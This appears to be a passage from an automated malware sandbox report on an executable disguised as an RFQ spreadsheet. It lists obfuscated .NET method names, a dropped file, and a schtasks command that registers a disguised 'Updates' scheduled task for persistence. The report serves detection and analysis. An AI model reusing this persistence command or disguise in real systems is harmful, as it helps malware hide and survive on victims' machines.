                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, WXLXx86ylIQfeMsLR5.csHigh entropy of concatenated method names: 'sKynf5yHPQ', 'Lg5nMC3SVq', 'dWLnDSdHNB', 'Rq8niDlRBu', 'k1XnxLShZM', 'oQqnKaXL1s', 'HQZnvK96Om', 'YDFn6w8YFe', 'NUZndorCoA', 'Iblnl6gjux'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, FxkmO9PvtoTWIXJWG1.csHigh entropy of concatenated method names: 'pfCi1prOjy', 'UYYiy3QDPB', 'VpSiqgDFR5', 'plUiPDBEDc', 'TfTiXUAcEl', 'qXkioceSUY', 'JOWimYSXIM', 'eKTi0PUjvy', 'CwpiYXfkFl', 'C0ViRmCs7f'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, S4uTr5z7YJMyG0JPGE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eKVYZlFYBd', 'PEwYX8p87g', 'VOtYowKfA0', 'NylYmCx31I', 'CM4Y0jMyO9', 'SlEYYlL09f', 'CsdYRA58HM'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, hZ9TRjivh2CC91EfYt.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'X0LSrTBQP5', 'yTtSIJN8Oa', 'H02Sz97U8S', 'mwDnCjy9Pv', 'E42nGGahrj', 'NXbnSvptGm', 'tqqnnobipD', 'saGI2FQQmKXk73q2q1G'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, sAxS2MJSRGlYALqvZ9.csHigh entropy of concatenated method names: 'kB90MogDrp', 'RW00DFKJCu', 'aLY0ib3oL2', 'WcR0xMnveW', 'LvC0KNVStp', 'gTJ0v328Ey', 'GJb06lYPp2', 'Cna0dM3B8p', 'fXa0lsZ8nE', 'fJJ0ARQDM3'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, xJ3quUjxTCHPdrK6rQ.csHigh entropy of concatenated method names: 'mXdGvMgrnF', 'h5rG6RuM66', 'WvtGloTWIX', 'XWGGA1qoJR', 'DlxGXmyL0Q', 'xxKGo2Rt1V', 'cxFY9OvLZcN6ESiIpv', 'LHkIpUcgbvgKTH7bnE', 'FHNGGf0O2x', 'BWPGn7TZ16'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, waO3TSuHyF8gZH4h0U.csHigh entropy of concatenated method names: 'IhEmluFBeC', 'jrdmAuH19N', 'ToString', 'xICmMScR6F', 'wFimDJfP5W', 'UgmmijA0VD', 'd3Hmxg4aMw', 'Jj9mK1NtLV', 'hqvmvYGLjK', 'QxUm6CigB7'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, srYjTdcb7xHXR2ikdO.csHigh entropy of concatenated method names: 'pwZv8Nen0Q', 'eXQv5IiPSd', 'z4svb11qja', 'kpsv1qUKFa', 'knYvkZHsIM', 'Ojdvy4NlOr', 'yjuvs7F5G4', 'fZHvqb8hDu', 'rRivPxEFlK', 'WV8vUrslC1'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, FYINXRa7WnDljwogyG.csHigh entropy of concatenated method names: 'x2SXBl4VIE', 'LtPXH3AtKo', 'nxaXa5ce4w', 'vrXXFgMPAV', 'dJeX41QWwQ', 'UWrXTGEUnx', 'i8sXN3uL6Q', 'PZGX2UubPe', 'B6gX7BH9t3', 'HCRXO0papt'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, DoJRnRUQZ8SJGqlxmy.csHigh entropy of concatenated method names: 'eJ5xkPv8rx', 'yPBxsROcPo', 'Sh6iTT0STg', 'DFMiNwpE5H', 'qKWi2Wtbwk', 'CDgi7S3LKC', 'yFmiOra0ZR', 'yTjiEkmMKI', 'vLficMP1gP', 'jusiBlrgyk'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, sPshwgSvwCm5KLaMaH.csHigh entropy of concatenated method names: 'G3UbUhyTo', 'Nv51p96qR', 'pxYy6stj4', 'msPsm0Wss', 'zYbPEB0Fh', 'xi5UGISgI', 'XDvO9CJofB4me6kT7y', 'xOvNkboYggKS31dyEA', 'i5t0kMK87', 'dZ0RGW935'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, K6uYoxwYkvgQZqPZti.csHigh entropy of concatenated method names: 'MSlmJf9su5', 'NVlmIl2RLQ', 'THZ0CdgddE', 'sUv0GPf9wH', 'l4YmpffOXR', 'qmxmHl2nlL', 'or5meRudfy', 'g9hmaZNspi', 'ww3mFtyw0s', 'nvfmVNPqWr'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, irAqRReI113hs4CKMq.csHigh entropy of concatenated method names: 'VuBZqZVRHX', 'GmGZPL8RNq', 'OZtZgaV88e', 'KGOZ4JHnwX', 'Y0yZNqnqbg', 'HuRZ2GfjwA', 'CPqZOD0x0w', 'R5aZEOXckS', 'mZxZB7Gw1D', 'cdaZpCBAM4'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, dqNH5EDJbwOd74asBH.csHigh entropy of concatenated method names: 'Dispose', 'rN0GrBjrtQ', 'SltS4Fcypp', 'CbQNN8N4u7', 'WRAGIxS2MS', 'tGlGzYALqv', 'ProcessDialogKey', 'n95SCIBlSe', 'dJYSG14MQO', 'auESSmrKNN'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.288e26c.1.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, BXf6FBO8RUpjNfUvb9.csHigh entropy of concatenated method names: 'mhUvMcwqon', 'IAOviKPKa5', 'jVCvKk9uNr', 'oFFKIv2Q9E', 'dXpKz8YSZ4', 'Jn5vCtCapQ', 'HnPvGYHQkj', 'ntSvS3v78y', 'Cq5vnr57wd', 'vh1vjBwX4A'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, t0Q8xKg2Rt1VrenmFW.csHigh entropy of concatenated method names: 'H3VKfcptMI', 'ApxKDPuCVh', 'EVXKxXidVL', 'B17KvgMWAR', 'qajK6j4F0j', 'tG1xtnY5cL', 'G7GxwkLdQ7', 'b7gx9q8Hhc', 'LI2xJ2pehw', 'LxAxrJ6I2l'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, z4Lt9BGCCfMS3EUAYkN.csHigh entropy of concatenated method names: 'qE8Y8tgVAq', 'uWqY5QBjba', 'aZLYb8He3d', 'jWiY1hu1P4', 'CTjYkhxgjj', 'f8XYyke7OR', 'PrKYsOWfGw', 'dMJYqaOQRj', 'XV3YPGBv3x', 'hMUYUEnKXF'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, lMgrnFqi5rRuM663RZ.csHigh entropy of concatenated method names: 'pJ6Da2IbYg', 'lhfDFycPY9', 'POqDVajNoF', 'SwfDuqA7o3', 'AMHDtuun4L', 'HTLDwE1eKA', 'oJfD9IEfqC', 'lodDJMpIVO', 'wSiDr85Lhv', 'xpSDIV9aPF'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, qrKNNWIs1iYM2TK7gp.csHigh entropy of concatenated method names: 'gWoYGhdVAx', 'nCHYn3uVIJ', 'Rn7Yj1uD02', 'TAeYMdTIya', 'kv9YDgKdyO', 'W7mYxm78GO', 'm3lYKARpgE', 'q5q09vm0n9', 'rTq0JqQKOj', 'aU80rUDyVJ'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, uwv9tXGnDnUKhCEBhfI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VY9RaHt1RX', 'tZeRFu2b5W', 'in6RVpfY3K', 'l2XRuY1cMa', 'omDRt5qpFk', 'FmYRwbvEw2', 'Tr1R9N3amn'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, WXLXx86ylIQfeMsLR5.csHigh entropy of concatenated method names: 'sKynf5yHPQ', 'Lg5nMC3SVq', 'dWLnDSdHNB', 'Rq8niDlRBu', 'k1XnxLShZM', 'oQqnKaXL1s', 'HQZnvK96Om', 'YDFn6w8YFe', 'NUZndorCoA', 'Iblnl6gjux'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, FxkmO9PvtoTWIXJWG1.csHigh entropy of concatenated method names: 'pfCi1prOjy', 'UYYiy3QDPB', 'VpSiqgDFR5', 'plUiPDBEDc', 'TfTiXUAcEl', 'qXkioceSUY', 'JOWimYSXIM', 'eKTi0PUjvy', 'CwpiYXfkFl', 'C0ViRmCs7f'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, S4uTr5z7YJMyG0JPGE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eKVYZlFYBd', 'PEwYX8p87g', 'VOtYowKfA0', 'NylYmCx31I', 'CM4Y0jMyO9', 'SlEYYlL09f', 'CsdYRA58HM'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, hZ9TRjivh2CC91EfYt.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'X0LSrTBQP5', 'yTtSIJN8Oa', 'H02Sz97U8S', 'mwDnCjy9Pv', 'E42nGGahrj', 'NXbnSvptGm', 'tqqnnobipD', 'saGI2FQQmKXk73q2q1G'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, sAxS2MJSRGlYALqvZ9.csHigh entropy of concatenated method names: 'kB90MogDrp', 'RW00DFKJCu', 'aLY0ib3oL2', 'WcR0xMnveW', 'LvC0KNVStp', 'gTJ0v328Ey', 'GJb06lYPp2', 'Cna0dM3B8p', 'fXa0lsZ8nE', 'fJJ0ARQDM3'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, xJ3quUjxTCHPdrK6rQ.csHigh entropy of concatenated method names: 'mXdGvMgrnF', 'h5rG6RuM66', 'WvtGloTWIX', 'XWGGA1qoJR', 'DlxGXmyL0Q', 'xxKGo2Rt1V', 'cxFY9OvLZcN6ESiIpv', 'LHkIpUcgbvgKTH7bnE', 'FHNGGf0O2x', 'BWPGn7TZ16'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, waO3TSuHyF8gZH4h0U.csHigh entropy of concatenated method names: 'IhEmluFBeC', 'jrdmAuH19N', 'ToString', 'xICmMScR6F', 'wFimDJfP5W', 'UgmmijA0VD', 'd3Hmxg4aMw', 'Jj9mK1NtLV', 'hqvmvYGLjK', 'QxUm6CigB7'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, srYjTdcb7xHXR2ikdO.csHigh entropy of concatenated method names: 'pwZv8Nen0Q', 'eXQv5IiPSd', 'z4svb11qja', 'kpsv1qUKFa', 'knYvkZHsIM', 'Ojdvy4NlOr', 'yjuvs7F5G4', 'fZHvqb8hDu', 'rRivPxEFlK', 'WV8vUrslC1'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, FYINXRa7WnDljwogyG.csHigh entropy of concatenated method names: 'x2SXBl4VIE', 'LtPXH3AtKo', 'nxaXa5ce4w', 'vrXXFgMPAV', 'dJeX41QWwQ', 'UWrXTGEUnx', 'i8sXN3uL6Q', 'PZGX2UubPe', 'B6gX7BH9t3', 'HCRXO0papt'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, DoJRnRUQZ8SJGqlxmy.csHigh entropy of concatenated method names: 'eJ5xkPv8rx', 'yPBxsROcPo', 'Sh6iTT0STg', 'DFMiNwpE5H', 'qKWi2Wtbwk', 'CDgi7S3LKC', 'yFmiOra0ZR', 'yTjiEkmMKI', 'vLficMP1gP', 'jusiBlrgyk'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, sPshwgSvwCm5KLaMaH.csHigh entropy of concatenated method names: 'G3UbUhyTo', 'Nv51p96qR', 'pxYy6stj4', 'msPsm0Wss', 'zYbPEB0Fh', 'xi5UGISgI', 'XDvO9CJofB4me6kT7y', 'xOvNkboYggKS31dyEA', 'i5t0kMK87', 'dZ0RGW935'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, K6uYoxwYkvgQZqPZti.csHigh entropy of concatenated method names: 'MSlmJf9su5', 'NVlmIl2RLQ', 'THZ0CdgddE', 'sUv0GPf9wH', 'l4YmpffOXR', 'qmxmHl2nlL', 'or5meRudfy', 'g9hmaZNspi', 'ww3mFtyw0s', 'nvfmVNPqWr'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, irAqRReI113hs4CKMq.csHigh entropy of concatenated method names: 'VuBZqZVRHX', 'GmGZPL8RNq', 'OZtZgaV88e', 'KGOZ4JHnwX', 'Y0yZNqnqbg', 'HuRZ2GfjwA', 'CPqZOD0x0w', 'R5aZEOXckS', 'mZxZB7Gw1D', 'cdaZpCBAM4'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, dqNH5EDJbwOd74asBH.csHigh entropy of concatenated method names: 'Dispose', 'rN0GrBjrtQ', 'SltS4Fcypp', 'CbQNN8N4u7', 'WRAGIxS2MS', 'tGlGzYALqv', 'ProcessDialogKey', 'n95SCIBlSe', 'dJYSG14MQO', 'auESSmrKNN'
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeFile created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
